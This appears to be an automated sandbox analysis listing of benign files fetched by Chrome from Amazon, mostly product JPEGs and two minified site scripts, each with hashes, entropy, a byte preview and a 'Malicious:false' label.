                                                                                                                                                                                                                                                                      SSDEEP:96:TvYNRxsjz4TIRmuiMG5u7/k98WbI3tDT3uKlU3f9tbtQVVZe:TIRgzJmXew98WbatP+KlU3ntQVS
                                                                                                                                                                                                                                                                      MD5:CD266436638ABE7EE255107E7814CB34
                                                                                                                                                                                                                                                                      SHA1:4832E1DAA9710C44841F5315A9DD09E7FEB27D13
                                                                                                                                                                                                                                                                      SHA-256:FE71A7BA8625DE6E53DB2F6972240A441ACAC1E75731253DEA9F3FDB861292FA
                                                                                                                                                                                                                                                                      SHA-512:4D83119570526A6246CEC2DA076F6169741DB4B8A1742FA7FCED5C3FFABB6A133FC9A85F08367DCB09C8004EE4B65E9A5BDC8538FDAD37AC574E2CF85B00F9D2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........{...................................................!.."1.AQRaq....BS...2C..$3brs..#.................................................?..])J.)J.)J.g:......r..R..b....}...N...+x".>..5.tU.\\..I.aW>.I._...k.h.`L...!.m.....~jJ).a.9.G.x.U{......H7.v.......i..mt!..F.u..i...<.....J#......R..R..R..R..R..R..R.....{=>q.}......>...yX*..1'.6.....H......?qT..[.......g...S..dq.CPHj.V...X`*.......x..i.a...*.Mp.D@....%....'..j.7%..\%..'9I."...`.......t.v.....C.bw......"x(..A.MCJ.]M8%9....u.r.'`'i.y...R....z.C,..a.?."[.."..`...xQ...".@.)@.)@.)@.)@.)@.)@.)A...e.....aT..6...Q..X.~.....+.....T.L......y.b..-."._c.j.:>.dI...$@..v9.............K.n....d.`..O...........0U,........S...%...W.....%......n..~.@..y. ...R..R..R.D..m.L1...8...+.m..Kx.f.B.d.I..O..S6..Y..|....X....V..S06...5.Bc}.lx...G..m.}.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3285
                                                                                                                                                                                                                                                                      Entropy (8bit):7.855817789597912
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TzPae9Vrz8qPQPyHoglJWyAT/OLYq8TKoJXYeHFDYCD:3PaMVrLQPm5JWvT/q8meXVlDYCD
                                                                                                                                                                                                                                                                      MD5:431D10AB2F36F9779CCBE3DF87898ECA
                                                                                                                                                                                                                                                                      SHA1:6A57C677D8DE1128BDB326169F5E541D7EBB559B
                                                                                                                                                                                                                                                                      SHA-256:552A40BE6AB03FDC760AED68AF3DB6C1AB00314EBE0F46A0501705193F5DA3AE
                                                                                                                                                                                                                                                                      SHA-512:6D8B4A2A23A406287FEA0C25B9B1EDA3A860598CA406B21BF8985DF00F8B91DC6F1E01DEAA06BAC49966F77A5F542D5B2357803F22542CB0F57F1294A530AB33
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51Ma-nfVD-L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........}.."...............................................................!.1Q.."Aq...2r...#3BRas.........4Cb..S..$&u................................................1A.!.2."B............?..E.<....[.O>...s...X......88jQq.r......[e!. .....5Y...-......\._.~.....5^ ...}.d..........Pl.(...P.'..#.....3<.yE.^5,.j.....l^.$....4A.h'..xK......R.J."...../8.f...&...6..Ds.X.l.......C.Z@..,M..l;....d..9....>B..=.Kr.n...W.G<2...p..$.......]9...}.=..T\.....A.+.." "T..L.$...O...O.........b..t.s....x .Eji....a<.Zz.*....:3Sg.......oyA...O.6[..'ZYX".R.y..x.../..[E..x.f.....V...e....k..K.V....$..w......C...P...R.xOdo...<..Xk....u..].u..}W;.bp|J._...~..A.....:5~Z......Y..(.^.N....X..p...B....o...i.PG.9..........^.Y]Ol..8<..~....eg.....TM[..].....[KS..@...vS.M...."......F..".'....6h..Q.A.,.......N.G.b............'(X-<..n.Lz...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):111217
                                                                                                                                                                                                                                                                      Entropy (8bit):7.799995912977319
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:lsfkVfZ1fdPkflXw1Iv/y+QrSLu6XXXXAuHn:OfYdzz+MMXXXXpHn
                                                                                                                                                                                                                                                                      MD5:670EA98AE67886BBBECA3882BACA39AF
                                                                                                                                                                                                                                                                      SHA1:74452D9C64A63C74D59A89E9B102420CC21358A1
                                                                                                                                                                                                                                                                      SHA-256:F8E2DF00B9D96175C9E11BE6695A39450ECEB6BF854E80D361839D46C7D33A81
                                                                                                                                                                                                                                                                      SHA-512:55508B1CABCB81BDEE9EE025C7013626CEA950A32F35DB9AB2FB2A284D3DF7C35E10177F18272C7EFD4E32C39B779156D5BE56AFD9EC1832B731DAEFA72D1EF9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61HEmdT49OL._SX3000_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF................................................................#"""#''''''''''..................................................!! !!''''''''''..........."..........5..................................................................................................................................................................X....@......*.P....X.Q(J........P..PJIF'^f/..lx.@...........X....)...@.%.. 6c.3................................................................(.............,...............YBRP.X,RP.....%.. ...P...............!....\L.............(.*RYI@...P..[1.................................................................. ........................J%....(..D.(E.DX....!@.............K(..q3z.b.8.)...............@.J.J ..l..f..........................................................................W...<..>..n5.[|s....w..K.H.2.Y...[.../..n..o..#.....7...~..lG.@......AA(.......P..............................[.s...................Q.@l....................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x211, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17924
                                                                                                                                                                                                                                                                      Entropy (8bit):7.964691213772312
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:ZEcO7Gw1gL569WLtSBjcUBGQjtE/2u5PRPBXWohFyr976:icOpIeWL8ckGOupPdxhFm9G
                                                                                                                                                                                                                                                                      MD5:0DEDE4C1CA195F7B21862BAA0B16D535
                                                                                                                                                                                                                                                                      SHA1:4167129D4AE03A260A463A5C78BC19588BE5EC90
                                                                                                                                                                                                                                                                      SHA-256:2082B7FCC9B18FD345052A15BE198F8583360FCB47C9C44B253086BE2AF9BB8E
                                                                                                                                                                                                                                                                      SHA-512:4357E1BE4D882168C96DD859031ECF99BB2FFADB268682BBBBC887CB0A813BDE1148F9ED9EB774B8D397E8439C98622BF6C8221DDAF292EADAE3343C28026628
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/717GC0EDl8L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5.........................................................................>..N#^.k....7.B..........*..v|.P.`.......5.._>RQ.....P}S.......zO.......s..W....[.<..M...=.7|....../%.Vq...1*..N.h...~?_.....s...7....}f......Iw.|x6T....{|.?D:oV\..q..........W.......v?......MO92..'D..]..X........-...9Q.......m,..r.K04zk..t.<u..vcO.....+..+.w..S.Lt.1.>x..O..._.......:..9[.....6....v...m.k+.?...l8........X....\.'......RP...\.......ue...U.m.J.'......._.....|..*+L...4`.*.]..d..|.ub.w..y..eMeh....[..;.y.}.._...g!...uZm~...H.X.....c...........c.'...k(..gk....I...&....g.&\;.>.V..........].-i..h.+..^;.I....l....cd...H..C.ye'......^z|=6........{.Uu.r...b.;.>9...t.6..>.U..7.E.....]........PyL4.w..&].f...o.l}.c3.:../....m...._....k...O.......=..+.....=1Y!..s*#qJ.G..ouk..P.7......OH...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):13784
                                                                                                                                                                                                                                                                      Entropy (8bit):7.911497864319653
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:5jxd2acFO+8tcEnWcumLx1Vu1ZOj6nI7k:df2AtpxXXm06nIw
                                                                                                                                                                                                                                                                      MD5:94502476E8FD16C7E39765761AB4FF97
                                                                                                                                                                                                                                                                      SHA1:067C02240D92A95D6093A0CEA4D5F569C1553934
                                                                                                                                                                                                                                                                      SHA-256:DB3AE2FB412A84AB6D4837F2ACD72DC143B04BBFCE9A84AC22E242D2F3A908A7
                                                                                                                                                                                                                                                                      SHA-512:98ED84994F518CA01B78CE40F9777A3DF20F4D08EF47543A747EAFC6FAE90E173059340F2BE5AB16764A8D38A26791C270EC395591468466FCD1436588A54FC0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......0.{.."..........5....................................................................@................................................y.*..G>......<..A.n....~.(.B"y.....9.....9...._Q[.I.I.......]...nW....p*...;r.O.a......5..;.6.~.4r..7.{.W.......-.....S........j+.)!............m.U.x.W%...#.c3.`...72.."~.[X.$...Lo..8..o.........b...p3.q.En.W.RC.w.......u#ws*.....x.eG.....w&.....g...A}.^&9R....f....$.n.U.eF^.DN.Y..i.......2.....H{n........n.e[r...7..s..1...K....-......M...T.C..K]$J....b.`.2.8-..F<nY.K_'.^.I.k.......MaMX.J..~.!~.!~.!~.!~.!~.!~.!~.!~.!~.!~.!~.!~.P...............h......D.,...c0z......g8.....1....5....L...L.S\.}..(..........P[...\B_....6....6a_......Qx...H.:....C..eFd..X.1;..W..4...*.B.................^. ./.>..,z...a.n....{....D.u{M| .=.|.;!..X....{j.....D.i.....W..}..(..........P[
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):21041
                                                                                                                                                                                                                                                                      Entropy (8bit):7.953750321195448
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:eVmMpKVfCg/Ys52rzs46sAtzMxCYmGS1+ls0yeyn9ZCsqs5ascN1:8pKlCu5ks4atzMbmGvP89ksqLN1
                                                                                                                                                                                                                                                                      MD5:664A7A4012F5C892E459C132AC5E9862
                                                                                                                                                                                                                                                                      SHA1:6FA6697578C2ABEE5548FE1E7DBF7D4F20245AA6
                                                                                                                                                                                                                                                                      SHA-256:2FE5BAE0714C85B43FF5F2BC131310DAF109352B1E2191550FFA2EA82849C5E6
                                                                                                                                                                                                                                                                      SHA-512:F1BAAF58B5CC52605570F3389133D855FE6B0F22881ABA60E180C0BD6D4E20D0251B15C05BFC9A3B90F084812A409C4A37B202620EEA9BE47998B758CA62C7B7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71b4SNq8EUL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........4......................................................................)h..M.(WL/.1.W~|.b..]......................{.^{..7..+C.L..=.....]....6...Vf..@..............?T(..1.-&-.:d.kN..]#....Fm.Y..&.}..=H.Bs.M..............q.-.<-.....X.,+..V..H.....au.kY..f....A....?.....;.@.............7..H.,......M'....Z..P.....D....#..m6.t...86G.?x..3l. ........T.?..sU..."..V....d{.r\.....Zv..0..:q.=..7l...ab...b....1.P./y@.....+..sJg...~....#...qC+.ZmS.Qn.[.=~.. .CVC..m.Jb.&.......mAcV.%TS.Qc......oh...z.....SW74..b.W..w.......[U6..o...&3.>.3....a.........U....&...ZGX.J!R..|....">...}..-.{.]..z*..H.B....$v!e3...x...y./..K...)A1.%....r.{.EH..n.......x.9+.I...M!z......7~...}....'M%Y.. cZG.d~1`.(..EA..pl..f.$Ws.|.(.LU..k...I.....`.K..M.J.>N.D-...o.>x}...C_.......g^....6%>.hA.t.<.XfH.....R....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4032
                                                                                                                                                                                                                                                                      Entropy (8bit):7.869044306421467
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:i5PPh+mj9AWYd1Rl0mh3P1Iu5dtduGqXH3TnT+UtAJR3qrt8E8aWya:iH+U9GqWtIwXsRXTnRUM8a6
                                                                                                                                                                                                                                                                      MD5:51C5C4FDE59FD0F3E266E8865CC71F97
                                                                                                                                                                                                                                                                      SHA1:0519C451847E1F670555DC7F3CDF4E84EF3C6227
                                                                                                                                                                                                                                                                      SHA-256:A4AE430072696319BF8D95CB4034081EEB1B16E09F467919FB8D77D78ADCE7F2
                                                                                                                                                                                                                                                                      SHA-512:C2F8782C007146985880014C19EAA6670D07681014AF7A7ED88F674B3A3EC0CEDDF1B07B120AC1CA67489425CF9E669668096083438031A6C25E85DB66BAA632
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF...........................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........t...."..........5....................................................................y.yE........3...e.\,.'.-...Ocw....dw..^8...Net..|S....@.i.....k...c|./9.r:;C89(..........i.y.....0.aq..@...j..(..+...}..)..T....9..H...<...$K.bt..T...Xk...g.l.e.{..L-......o...g.7...Ps.N.X.C.....'.@A|..#.....s]R$)O.hi....63.......s=......`.....'.....?;......$...:..1-_.t.2y...of./.,.:.@.......'..2N?#b2.......@...L.R.....G.r.....s...t.....P.d.....$.S..D...zz..k...03E...(..9 .......E..........................!.1A..."02QTaq... Brs.....4S...#36CR............?...:...M..!..rX.W.9.V?...9.V?...).R?...).R?...e.d..xv_V..5..Z?..f.x.#^.....xvoW..5..}^?..&.d..xroWO..%.t..D.$q.1.C~}.......T...Ga'.t./.......Z....S.).WB..<.%.x!}..b.dK.U[..FEj.....F..=..{..M..{...C5.v.[A*8s.L.!.F..-e}.5...7.$.&#]..+.y..p...Q.$.I..1.[g....21i+Oj.K5....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x375, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):77572
                                                                                                                                                                                                                                                                      Entropy (8bit):7.985301881555744
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:EAMKy0tYZzf+OY6gJNtDKJhR8f5CXWf2ePG3Kb:tjy0kNuJ/wRCCXAPGc
                                                                                                                                                                                                                                                                      MD5:7F1EEDB33A8003499FD536AE94293958
                                                                                                                                                                                                                                                                      SHA1:088657396D4B1837FFE1AB054406853511634317
                                                                                                                                                                                                                                                                      SHA-256:CA3C2477B8EA492ED554433C7B7C68358655F8ABC9E21899B5662F59543771E4
                                                                                                                                                                                                                                                                      SHA-512:BC24BDDEE341510CA66CC3A3C788642CCF46088513C8A9F7FE49C2C682985742B2EADECF3CC95E6B4B8AE1F8A877D7A6BB29D303DEA85E42B673913573F841D1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......w....".............................................................................A...!...0L.l@..L..&.PJ.B.$..V.T.4$.*.H.J.*...HT.....$."[.D.P.)&..L. @.a.E.....YO}..F&0.......4.V.\..6.. ....T.M.PAH..fPIh.a..f..iT.....).1%_z....9.QG.uu.\....z.X...<e.y...}D.t....~D_7G(.>.b..........C.Q ...0.b...).........*A9.*I.J.....F..#.<.;..OK...%..{...Nof.s.....1.....-;...S....I._@x..@.............!..!......4..%..4..@&"..24|........h....Ye.gB.....(dI..T... b. ...F .`..-..Y.Y.....%.h.....h.. ......t1"..$(..9..L.<.y..'.H....O../.....-85.......K )HQ,..l.4.d...1...&....;9D.e...f.t.....`..P..d......e^F.Zs.#dY..>..9..x.us..Yr...'../.....Fu\.wwNQ<.....=Ln..x../i..[.\Yw...N.<.....kf.vs...m.F:.$O..'......^J6L....mjWAdey..)...:nJ.0.....v1...%.r.q........2....^W/OG..>=M..4...y....{....Y.~...|q....b.k.L=}.sc.G.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x310, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30719
                                                                                                                                                                                                                                                                      Entropy (8bit):7.982393070005615
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:MFyobo1LrFn4nmGnGQQliqisJYJIu15F7rNkqKzbSIBK:MFyGotFn1Q27Sp5dNkqGSIE
                                                                                                                                                                                                                                                                      MD5:4364558961409C3A0776B95C8038719D
                                                                                                                                                                                                                                                                      SHA1:80EC1EB2D637B197C85279A1194835F0268EB22F
                                                                                                                                                                                                                                                                      SHA-256:7BD1721F952B494FE95DDBFB201C383AE0FE308F24BE04F9D177C72E6AAFF6B3
                                                                                                                                                                                                                                                                      SHA-512:729B085151EA44CBED74C0E7FBA001ECA46FA7C06324C25B631F2F6A5D4069C604D78F0A65A241F31D2E59A1FD5518584F9B6367075727B9A6E293E09AA5387E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81mZlEPiyrL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......6.@.."..........6......................................................................+..^tl"..W.........H"....!<.....S..W.:....<.K.o.~.#..9{.`.p...$...F<._......rw.)Z...w......r.2.x.d...*xe...{.Mr.......]..z....90+....y>&.*./.%#...y..`3.$........].H+.[.....z6."..]....U.m.e..4f....).6{.S..@..gf...e.]#...|...I..C..Pbg.w...{{....H%.\d.zU..$........A......d2...u&JZ..V....ApdZ.cMI'TBf....K...C..l....J....V.{\.;....c.E..V..dU..r...0.....s..M.:.b.AdJ^.$.*.=t.\$.+...x.^../.y..-....b..2%U.vg)!...Q...%.......7}.3)...j.......D.?....,..0...._B..N.....C.oP..3....=.....F.............}9.]....<.d$.....f/..I0IX.b.N"....a....M.........^...W...n..y.\L..j..$...X...^Sw/$>N~...U..0...._K3I..d."[j[..]..[Y..5)...(.Gz.>...2.R..?...)...s_E...Z..a2f/..cz..p. ..s..?Oo.....d_%........c.h=.)o!.`:..Kp..]...r"w.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (42564)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):42614
                                                                                                                                                                                                                                                                      Entropy (8bit):5.343120598013134
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:kzZ6QexaNOF3QrJ9FL0PD+MtOxKjizJRiaLaeW0VofOCMpqfVO0aU3APeKRlqMir:kPe4O1RPD+k8W0E4qo0yeY/iDogyZS
                                                                                                                                                                                                                                                                      MD5:F467A8043189BE8253E63864BECDFEC1
                                                                                                                                                                                                                                                                      SHA1:657D4F54B62346FC45765E9DDF558AAD95C40368
                                                                                                                                                                                                                                                                      SHA-256:2DFA2C991A88BCFA1052671A06FB6F2619637CCB5FB3A7345FF97E5DF244E592
                                                                                                                                                                                                                                                                      SHA-512:6303642D244EC687CA1C6667359AEC5D3DEE5A225C14A8A5CDEE630A14424EBD0116CE2F023CDA46EE3122EC9485D21741AA4A4AD3A93A51C554641AE0ABCCEF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(()=>{const e=e=>e+"_Feedback";class t{async addSponsoredLabelWithFeedbackLink(e,t){e.appendChildTo(this.parentHtmlId,this);const a=await t.getSponsoredLabelAndFeedbackLink(this.urlPathAndParameter);if(!(null==a?void 0:a.isOk()))throw new Error(`Result from the feedback service was not ok ${this.urlPathAndParameter}`);e.updateElement(this.getHtmlId(),a)}getHtmlId(){return e(this.parentHtmlId)}isHidden(){return this.hidden}exists(e){return e.exists(this.getHtmlId())}constructor(e,t,a,n,i,r,s){this.parentHtmlId=e,this.feedbackStyle=t,this.labelText=a,this.labelStyle=n,this.position=i,this.urlPathAndParameter=r,this.hidden=s}}class a{open(e){e.clickChildLink(this)}getHtmlId(){return e(this.parentHtmlId)}constructor(e){this.parentHtmlId=e}}var n=function(e){console.debug(e)},i=function(e,t){console.error(e),r("ERROR",e,s(e,t))},r=function(e,t,a){var n;null===(n=window.ueLogError)||void 0===n||n.call(window,a,{logLevel:e,attribution:"APE-safeframe",message:t+" | "})},s=function(e,t){return
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (582)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):29992
                                                                                                                                                                                                                                                                      Entropy (8bit):5.302112970320793
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:w6e443sqMQCdnf5NW7mnWJ1pq/d5aaYjMgctsUvByiCiFYrvwk:w/4ffe7sWJE5rtsUpyk4
                                                                                                                                                                                                                                                                      MD5:571E10191E59134E8902CDF0F81747CC
                                                                                                                                                                                                                                                                      SHA1:6E8CA559371BF536FF98680CDD39AA29F60C129A
                                                                                                                                                                                                                                                                      SHA-256:D8A082163AA29448AB65E7E318CD714BF680B6DB9654E7D5FB2E3BB5A7FDDCA8
                                                                                                                                                                                                                                                                      SHA-512:031BB62ABD51F704E15E23D823269C78C2C787F43C28B75DCE551BBA7DAE63411B82A870399532C0E14B7B827BC69207D37BC83D859A37F6E018021B386ADBB3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://images-na.ssl-images-amazon.com/images/I/11mVszy8FIL._RC%7C41k9TQrnHzL.js,21cuxCuJB9L.js_.js?PUISClients/AmazonRushFramework"
                                                                                                                                                                                                                                                                      Preview:(function(d){var g=window.AmazonUIPageJS||window.P,q=g._namespace||g.attributeErrors,f=q?q("AmazonRushAssetLoader","AmazonRush"):g;f.guardFatal?f.guardFatal(d)(f,window):f.execute(function(){d(f,window)})})(function(d,g,q){function f(a){l&&l.count&&l.count(a,(l.count(a)||0)+1)}function m(a){return[].concat(null!==a&&void 0!==a?a:[])}function r(a,c,b){a.addEventListener?a.addEventListener("error",c,!1):a.attachEvent&&a.attachEvent("onerror",c);a.addEventListener?a.addEventListener("load",b,!1):a.attachEvent&&.a.attachEvent("onload",b)}function x(a,c,b,h,e,d){if(a){a=document.createElement("script");r(a,e,d);if(c)a.textContent=b;else{a.async=!0;if(e=h)e=-1!==b.indexOf("images/I")||/AUIClients/.test(b);e&&a.setAttribute("crossorigin","anonymous");a.src=b}b=a}else c?(c=document.createElement("style"),r(c,e,d),c.textContent=b,b=c):(c=document.createElement("link"),r(c,e,d),c.rel="stylesheet",c.href=b,b=c);(e=document.getElementsByTagName("head")[0])&&e.appendChild(b)}function k(a,c,b){retur
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8724
                                                                                                                                                                                                                                                                      Entropy (8bit):7.761883753720958
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1Wjw/yUNf5ll2HDuQ6V71Jc/sQQN1DvyVGRYfErc9AMFvj0GIqs1:6GmaQi5eQbRY0c9cGIqk
                                                                                                                                                                                                                                                                      MD5:7A6C54F0AC32E2B191446B619031115F
                                                                                                                                                                                                                                                                      SHA1:72F98CDDE0225D2BAA6B49F6423C9DEA69C8F483
                                                                                                                                                                                                                                                                      SHA-256:2582D182D6FA8247E2D35FDC2A92A6CDA8D98121770861C8C33FB571365CD1E9
                                                                                                                                                                                                                                                                      SHA-512:9AD1A9703931983793686829614E6AC7448768B08B2C2420FDF83463FE6EF4B5EE7EFCEDC9F196B4696811887F34B2AD0CD09DA2B310E9C81338EEB5FE175B51
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31ihwTsvbBL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................................................................................................................................................................j..".~u..4.}b..\.e........l.7...-..%8l/5.......Q}..j..'..).....8.............L.Z=]..Im.{|...A.>;.6...N...{-.......T5..T.o%.g*.'.j..|..&.#.3.*....F..V.z.z"................G.1..@..p...}M.........C......wT.T.Qxl..N....eb.U~*[...V...".Hd.%..P..........9...............^.&.5N;>.....R.fJ.......2....N..Z..!..he.9...........J5.63+.F.m..&..=..=.~9H.............]...w...?..'Bg.u....wm9.7Yr.YMb:.p.E;6...=...gey...y6....-....6.....7.0..t/>t..2.9..............k...z..I[]ZLrOZ.O\.uO8.8z.I..U..}.....^...=.....0..H..+...+.9....f.r...........0?..u...4.....K.Ir?]r?X.x.?...{..$jCM.Y.]....,...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8704
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958492553454244
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:TsG8DL94cg11OHOHadPCqWVt0OWcxaLWznnee9tCdKfGdNs56+ZE:TsG6AV6FMeOVx3n99tCwfGdA6t
                                                                                                                                                                                                                                                                      MD5:3891A8405D954749DB4E5D5E7E5D72AD
                                                                                                                                                                                                                                                                      SHA1:FC6A597C3254A2F8465BBC73E6D0128F244CAC41
                                                                                                                                                                                                                                                                      SHA-256:7F4DBC79169686970506C0D506C42F12B6E59F192E0EEF7FC4DC11C5DC5CDEEC
                                                                                                                                                                                                                                                                      SHA-512:5F7124B7FAC32E5F15DDF1FA52083B56095F1372FE082A8E14386711FC1F9C0DE0D76942A240B9A6DA108D75C086EB201D94A5ACE4FAE55C75E62A49013AFEEC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.AQ.."2Ra...Bq...#br......3d...$DS.....................................................!A.1Q.."2B.aq.......3C.r............?..(..".(....(B*..q...--.<. ..9....9.{.EZ.F...($.+..~)..Q.)}...h,T..O.....i....G.{....W~.nU=..\.Gvz..c...u..8..x5.x.oe~F.,}V.....|..r.o....kw...1..a.F....E...t.q...h....8zG...{..a.....%O. ./..pTN...U.>...H?:.+..6@z..fd..e>...jP..J<....]........wB..}.i.c...+d.^.90.g.ki...H..L....\-..U.R...o.E....QE.E.QB.EW....)...G..3.H.2.|$....{..{.A..U.....A?.Qb.m#..U(.V.?....D.....5}SRe.H...'?5...W<...X.Q...;..B...k..+G..-..\Z#..U....n...i3$.gj......<...?... #..H....U..Y.nF.w~'%p..X<*27eR4v;z..(+ZJ.)..5.:._...n...J....6..;;..n........6..GP...hm.jSMhe.....^.]w..y..Wn..1hH..~...^..d.......5....S...@z*...Vz...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
